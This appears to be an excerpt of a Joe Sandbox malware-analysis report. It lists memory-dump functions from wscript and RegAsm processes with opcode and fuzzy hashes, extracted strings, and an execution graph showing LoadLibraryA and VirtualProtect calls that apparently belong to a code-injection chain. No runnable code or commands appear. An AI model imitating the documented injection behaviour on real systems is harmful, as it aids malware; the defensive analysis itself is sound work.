                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_3_51a8000_wscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: WtR
                                    • API String ID: 0-1485073677
                                    • Opcode ID: b4898e1d13a32e43369dcde3abf74b6fb83c62a883448fef4ea7ac13b76d89ee
                                    • Instruction ID: f2c42e56ae3b0c73ba63dfc8f98359cce57ffafa1d5644217f6fc2ae474bfe67
                                    • Opcode Fuzzy Hash: b4898e1d13a32e43369dcde3abf74b6fb83c62a883448fef4ea7ac13b76d89ee
                                    • Instruction Fuzzy Hash: 4BE146A680E7D15FCB1387705C79A917FB06F27204B4E85DBC4C58E8E3E699580AC763
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 051A9F5D Relevance: 2.2, Strings: 1, Instructions: 968COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000003.2049742150.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 051A8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_3_51a8000_wscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: WtR
                                    • API String ID: 0-1485073677
                                    • Opcode ID: b4898e1d13a32e43369dcde3abf74b6fb83c62a883448fef4ea7ac13b76d89ee
                                    • Instruction ID: f2c42e56ae3b0c73ba63dfc8f98359cce57ffafa1d5644217f6fc2ae474bfe67
                                    • Opcode Fuzzy Hash: b4898e1d13a32e43369dcde3abf74b6fb83c62a883448fef4ea7ac13b76d89ee
                                    • Instruction Fuzzy Hash: 4BE146A680E7D15FCB1387705C79A917FB06F27204B4E85DBC4C58E8E3E699580AC763
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 051A9FD1 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000003.2049742150.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 051A9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_3_51a8000_wscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: WtR
                                    • API String ID: 0-1485073677
                                    • Opcode ID: 57605d8b1afbcf101fd26b2cfcaedeb3c8a46dbbfb9524a04dac35a87c6bf216
                                    • Instruction ID: 6a35ac09c01c9c8f164dd4fda017503c6a0cb4293ecdcaf1a93353e739d44866
                                    • Opcode Fuzzy Hash: 57605d8b1afbcf101fd26b2cfcaedeb3c8a46dbbfb9524a04dac35a87c6bf216
                                    • Instruction Fuzzy Hash: D2E155A280E7D15FCB1387705CB9A917FB06F27204B4E85DBC4C58E8E3E698580AC723
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 051A9FD1 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000003.2049742150.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 051A8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_3_51a8000_wscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: WtR
                                    • API String ID: 0-1485073677
                                    • Opcode ID: 57605d8b1afbcf101fd26b2cfcaedeb3c8a46dbbfb9524a04dac35a87c6bf216
                                    • Instruction ID: 6a35ac09c01c9c8f164dd4fda017503c6a0cb4293ecdcaf1a93353e739d44866
                                    • Opcode Fuzzy Hash: 57605d8b1afbcf101fd26b2cfcaedeb3c8a46dbbfb9524a04dac35a87c6bf216
                                    • Instruction Fuzzy Hash: D2E155A280E7D15FCB1387705CB9A917FB06F27204B4E85DBC4C58E8E3E698580AC723
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:17%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:24
                                    Total number of Limit Nodes:1
                                    execution_graph 13296 2d609e0 13297 2d60a02 13296->13297 13300 2d61ef1 13297->13300 13298 2d60adc 13301 2d61f18 13300->13301 13302 2d61f39 13301->13302 13306 2d62390 13301->13306 13311 2d623a0 13301->13311 13302->13298 13303 2d61f5b 13303->13298 13307 2d623c0 13306->13307 13308 2d62432 13307->13308 13316 2d622d1 13307->13316 13320 2d622d8 13307->13320 13308->13303 13312 2d623c0 13311->13312 13313 2d62432 13312->13313 13314 2d622d1 VirtualProtect 13312->13314 13315 2d622d8 VirtualProtect 13312->13315 13313->13303 13314->13313 13315->13313 13317 2d62320 VirtualProtect 13316->13317 13319 2d6235b 13317->13319 13319->13308 13321 2d62320 VirtualProtect 13320->13321 13323 2d6235b 13321->13323 13323->13308 13324 2d62080 13325 2d620ca LoadLibraryA 13324->13325 13327 2d62123 13325->13327

                                    Executed Functions

                                    Function 02D62074 Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 566 2d62074-2d62121 LoadLibraryA 569 2d62123-2d62129 566->569 570 2d6212a-2d62179 566->570 569->570 576 2d62183 570->576 577 2d6217b 570->577 578 2d62184 576->578 577->576 578->578
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3309318965.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2d60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 62a4aa00fa09098ba0914b3109b6e269dd7f353ead470b7ae46f4f03de909887
                                    • Instruction ID: 0cc3ac411c0483e2ccf15d72dc0da461025366939fce339cd520b83e66a237c8
                                    • Opcode Fuzzy Hash: 62a4aa00fa09098ba0914b3109b6e269dd7f353ead470b7ae46f4f03de909887
                                    • Instruction Fuzzy Hash: 9631E3B0D05248DFDB24CFA9D588BDDBFF1AF48314F248069E409AB354DB79A985CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 02D62080 Relevance: 1.6, APIs: 1, Instructions: 71libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 579 2d62080-2d62121 LoadLibraryA 582 2d62123-2d62129 579->582 583 2d6212a-2d62179 579->583 582->583 589 2d62183 583->589 590 2d6217b 583->590 591 2d62184 589->591 590->589 591->591
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3309318965.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2d60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 6055253eed2254ac25ef876a96d13d30f089eb24cdbc2845ecaaefef30d622b0
                                    • Instruction ID: 6b62a920ea80c6d610253683acc051f45a5011d74458c7a6727bab07d0460c38
                                    • Opcode Fuzzy Hash: 6055253eed2254ac25ef876a96d13d30f089eb24cdbc2845ecaaefef30d622b0
                                    • Instruction Fuzzy Hash: 0731F2B0D01248DFDB14CFA9D588BDDBFF5AF48314F248019E409AB354DB79A985CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 02D622D1 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 592 2d622d1-2d62359 VirtualProtect 595 2d62362-2d62387 592->595 596 2d6235b-2d62361 592->596 596->595
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 02D6234C
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3309318965.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2d60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 8fa63ecc719a5c01b5eb17b3027a3c95e114ee688b39a6aab53c4fb7a696c15d
                                    • Instruction ID: 458b3004fd0e20766c4a6c43802573882b245e6411d445c5914fefdd51ef4d59
                                    • Opcode Fuzzy Hash: 8fa63ecc719a5c01b5eb17b3027a3c95e114ee688b39a6aab53c4fb7a696c15d
                                    • Instruction Fuzzy Hash: 2A2127B1D002498FCB20DFAAC884AEEFBF4FF88310F14842AD459A7210C7799944CFA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 02D622D8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 600 2d622d8-2d62359 VirtualProtect 603 2d62362-2d62387 600->603 604 2d6235b-2d62361 600->604 604->603
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 02D6234C
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3309318965.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2d60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: c9b63b392d287814f0160f87676334bffd51b54a7fc3d58a395145af496c8844
                                    • Instruction ID: 865bb88363c9d455f487a184792b06458617e8d1ba9a1fe419e96fdc3d8741fe
                                    • Opcode Fuzzy Hash: c9b63b392d287814f0160f87676334bffd51b54a7fc3d58a395145af496c8844
                                    • Instruction Fuzzy Hash: 9F11F4B5D002499FDB10DFAAC944AAEFBF4FF48324F14842AD459A7210CB79A944CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 012CD3B4 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3308389284.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_12cd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a48bee4ff8964ad6fe8e1ad681d13b5b0ea69217bb23d6fbd823813f1b40816d
                                    • Instruction ID: 9bc66b1e54a44a03f6bbeeb7086a4ff280842cf1a9342762ec2ffc3d43ffaa43
                                    • Opcode Fuzzy Hash: a48bee4ff8964ad6fe8e1ad681d13b5b0ea69217bb23d6fbd823813f1b40816d
                                    • Instruction Fuzzy Hash: 51210071510248DFCB159F98D9C0B66BF65FB84724F20C67DEB090B256C33AE446CAE2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 012CD3AF Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3308389284.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_12cd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction ID: f8769aa07c1e8c209f9b86bdb22e410768d8be6917a1ca153b933c26298212d6
                                    • Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction Fuzzy Hash: CF11CA76404284CFCB12CF54D9C4B56BF71FB84724F28C6A9DA494B616C33AE45ACBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    Function 01330F30 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (aq$Te]q
                                    • API String ID: 0-2961548996
                                    • Opcode ID: 1085d0870cfaa3aa8b11908f396323611c35bf7ef338676ce5e3df1646368ad5
                                    • Instruction ID: 698bf07975c7d7a58e97a34df1f103b26f2e4f17d53f42b7c459f07d09a90336
                                    • Opcode Fuzzy Hash: 1085d0870cfaa3aa8b11908f396323611c35bf7ef338676ce5e3df1646368ad5
                                    • Instruction Fuzzy Hash: 9A517B70B101148FC748DF6DC458AAEBBF6BF89710F2581A9E806EB3A5CB75DC018B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01330D98 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq$dLcq
                                    • API String ID: 0-1713614415
                                    • Opcode ID: 565081983dae670f30b7c1815961fc7bc62eac522c98b9a00b57073b7257581a
                                    • Instruction ID: 128c6ef5fe85829e4e0a089848ae40b79422e2bd07084aae8cbe91b47b6aa8dc
                                    • Opcode Fuzzy Hash: 565081983dae670f30b7c1815961fc7bc62eac522c98b9a00b57073b7257581a
                                    • Instruction Fuzzy Hash: 2941AD317002058FDB19DF69D498AAEBBF6FF89314F1444AAE105EB3A1CB749C05CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01331248 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    • Opcode ID: 0ac49a8a5ed48eb40c4effa7a1a698c33443d4c79e0a92e79f1cbc9b53362033
                                    • Instruction ID: 883dab8567d96622a085b99c8ee2e38497ade1852e3c909b7a884a6300b923f1
                                    • Opcode Fuzzy Hash: 0ac49a8a5ed48eb40c4effa7a1a698c33443d4c79e0a92e79f1cbc9b53362033
                                    • Instruction Fuzzy Hash: 8D51CAB0B002099FCB08EFB9C55066EBBFAEFC8314F248569D44ADB355DA35DC428B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01330D90 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dLcq
                                    • API String ID: 0-2236789282
                                    • Opcode ID: c9f1312e3e8d860808148f9791edf6abdc4d0238eac58ee404592bef12073b0b
                                    • Instruction ID: 732bd8deff506c7ae13d4f240a765de61d62d1b973aa458f5f38affe0762b145
                                    • Opcode Fuzzy Hash: c9f1312e3e8d860808148f9791edf6abdc4d0238eac58ee404592bef12073b0b
                                    • Instruction Fuzzy Hash: 48319C71A002058FDB18DF68C598BAEBBF6FF88304F148569E405AB3A1CB74DC05CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01331477 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: lqbq
                                    • API String ID: 0-1968102735
                                    • Opcode ID: 6804fdc6f12861a8d6eedb4e0b368aea8060c9ef556022363eed8f8285704c60
                                    • Instruction ID: 7148ae5091cc33603402e6dff2d673da712c8f3bc06064c65f0db627b87b25a8
                                    • Opcode Fuzzy Hash: 6804fdc6f12861a8d6eedb4e0b368aea8060c9ef556022363eed8f8285704c60
                                    • Instruction Fuzzy Hash: D321CF74A01206DFDB15EF38C51466E77F6AFC8304F2444ADD80AAB395DB369D02CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01331488 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: lqbq
                                    • API String ID: 0-1968102735
                                    • Opcode ID: 4d3451c1f7ab73381e860bb2d2182e80f28f1a3a6746d7f4478a66374b11be68
                                    • Instruction ID: aeb2ffda5691b4c1b1f2c4428dba4223976e9be1292125bdff447b92efb96653
                                    • Opcode Fuzzy Hash: 4d3451c1f7ab73381e860bb2d2182e80f28f1a3a6746d7f4478a66374b11be68
                                    • Instruction Fuzzy Hash: 5E117C7060120ADFDB15EB79D51466E37FABFC8304F244868D406AB399DF359D01CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01330EB7 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq
                                    • API String ID: 0-725504367
                                    • Opcode ID: 7c9bfdeffd7cb3dfc29d95b1d84c3e47cc78c46b627070634d14a8f22b9d08ae
                                    • Instruction ID: 16cda3f5e699290116732817ca2a695e614f37ad5ff39fe829726d1026eb1df1
                                    • Opcode Fuzzy Hash: 7c9bfdeffd7cb3dfc29d95b1d84c3e47cc78c46b627070634d14a8f22b9d08ae
                                    • Instruction Fuzzy Hash: 87F0AF307082614FC349AB7E985445E3FE7FFDA26031644FAD149CB3A6DE688C06C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01330B10 Relevance: .1, Instructions: 122COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1b1149ec828b466824169295de201cf42e84155ba5cb6047312a0d77540cb658
                                    • Instruction ID: 444f8db9acae693028d26da87b59fe3d194308cbae05aa50e9ee9703f7851184
                                    • Opcode Fuzzy Hash: 1b1149ec828b466824169295de201cf42e84155ba5cb6047312a0d77540cb658
                                    • Instruction Fuzzy Hash: 9E51F83850020BDFCB5AEF34F5689693B7AFFC4315714856AD8058B26CEB35A94ACF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 013309D0 Relevance: .1, Instructions: 87COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 630b7a7f98cfea17333f263eae4b85f969aca1daf3ee2b41658d3ee3d18c70ae
                                    • Instruction ID: 7a945833a8c3773bfc1605432f6935c045b28857ea453e93fff9147819b28b19
                                    • Opcode Fuzzy Hash: 630b7a7f98cfea17333f263eae4b85f969aca1daf3ee2b41658d3ee3d18c70ae
                                    • Instruction Fuzzy Hash: 793141347202469FFB6DAB79F85C23A3AE9FF9424D7044629B807CA155EB30C542CB69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 013309E0 Relevance: .1, Instructions: 85COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6013eb4cde860fa16b1cf2d46cacda27d789e8eff48937e08aac9f03bb27dd44
                                    • Instruction ID: e20846041cf756d6820732f49dbccb79712251c2cf9a6163950056103bdef9e0
                                    • Opcode Fuzzy Hash: 6013eb4cde860fa16b1cf2d46cacda27d789e8eff48937e08aac9f03bb27dd44
                                    • Instruction Fuzzy Hash: A93153347202479FFB6DAB79F41C23E3AE9AF8424D7044629B907CA155EF30C502CB6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 012DD3B4 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078028258.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_12dd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 084b226606dfa7b8a0a7efd39846d4ece4d6f76e86cce1bb91b4f8786145d04e
                                    • Instruction ID: c585997cc718a337880801e9f609478a6e68a969293862a6973a6a328e191dd7
                                    • Opcode Fuzzy Hash: 084b226606dfa7b8a0a7efd39846d4ece4d6f76e86cce1bb91b4f8786145d04e
                                    • Instruction Fuzzy Hash: E1216771510648DFCB05CF98D9C0F66BF65FB84324F20C56DE9090B296C33AE446CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 012DD3AF Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078028258.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_12dd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction ID: b474f6435269fac7427e3cd6028ece25e4cb74cc4f06428537c9f816e6471c0e
                                    • Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction Fuzzy Hash: DA112276404684CFCB12CF54D9C4B56BF71FB84324F28C6A9DA490B657C33AE45ACBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01330EF8 Relevance: .0, Instructions: 24COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4fe91f00833ac2f4bfebca1a16f0571b10d0b883aaffe43f0216936ddd375f6a
                                    • Instruction ID: 76eed67429fde2312c4414b5876b5400f1d3634f502c1358ebc43b4b243f2073
                                    • Opcode Fuzzy Hash: 4fe91f00833ac2f4bfebca1a16f0571b10d0b883aaffe43f0216936ddd375f6a
                                    • Instruction Fuzzy Hash: D2E08C313001105F83449A2EB88885ABBEBEBC812531544B9E10DC7351CD60DC024390
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    Function 01450F30 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (aq$Te]q
                                    • API String ID: 0-2961548996
                                    • Opcode ID: 7169b03b9033ac9c86e8ad5c37a1283e2c5075e1d67db12d4abba22279ca7d91
                                    • Instruction ID: fcc0b3a760428ae8137e0b4a42a4ac08f650f7a1542f78a7ee6a31a3d34e8cfa
                                    • Opcode Fuzzy Hash: 7169b03b9033ac9c86e8ad5c37a1283e2c5075e1d67db12d4abba22279ca7d91
                                    • Instruction Fuzzy Hash: 26515D70B101159FC744DF69C458A5EBBF2BF88B10F2581AAE906EB3A6CB75DC01CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01450D98 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq$dLcq
                                    • API String ID: 0-1713614415
                                    • Opcode ID: 0686ef8c48bdfc486aefd76e8a6a0bf4852d27ede720c9c59f60ecc5de075b7e
                                    • Instruction ID: 245cdd37ccb6547d5e89d006053bfd3c82765e5f84753764624a82a67ce82092
                                    • Opcode Fuzzy Hash: 0686ef8c48bdfc486aefd76e8a6a0bf4852d27ede720c9c59f60ecc5de075b7e
                                    • Instruction Fuzzy Hash: 494190357002058FDB15DF69D458A9EBBF6FF89310F1444AAE506DB3A2CB749C06CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01451248 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    • Opcode ID: c1a78f63349bb38eebe23dd0f895a22ca2316bec50f5513c68980eb02991fd39
                                    • Instruction ID: 73cb006d64f2fef880bbf82e5e5af219d6a435c6eebd87156a0455f8e4c13189
                                    • Opcode Fuzzy Hash: c1a78f63349bb38eebe23dd0f895a22ca2316bec50f5513c68980eb02991fd39
                                    • Instruction Fuzzy Hash: 9A517E70B002059FCB44DFBDC55466EBBF6EF89710F2484AAD44AEB366DA349C42CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01450D8A Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dLcq
                                    • API String ID: 0-2236789282
                                    • Opcode ID: aacf93f1da0c0d86cb1351643ff166cdb7063c74fe4e79f6250b9e84a18922a4
                                    • Instruction ID: dc0e758d054f29339e1c705abc551d25f1527b09ed0fef011e11ac5303f689d9
                                    • Opcode Fuzzy Hash: aacf93f1da0c0d86cb1351643ff166cdb7063c74fe4e79f6250b9e84a18922a4
                                    • Instruction Fuzzy Hash: 12318F75A002058FDB14DF68D558AAEBBF2FF88314F14856AE402AB361CB75DC45CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 01451477 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2080342273.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_1450000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: lqbq
                                    • API String ID: 0-1968102735
                                    • Opcode ID: 4f368e582b17d4a3843bb63b694239cf0d20c0e6a24a50e0793a729bfaa56713
                                    • Instruction ID: 5bb3187125eaa7aa8c9bd7a5b7e7d7d41103e8490b0c9d36c8c2dd2aa8ca7a08
                                    • Opcode Fuzzy Hash: 4f368e582b17d4a3843bb63b694239cf0d20c0e6a24a50e0793a729bfaa56713
                                    • Instruction Fuzzy Hash: B9218E30A00205DFC754DB78D558B6E7BF6FF89748B24086DD806AB3A5CB35AD12CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

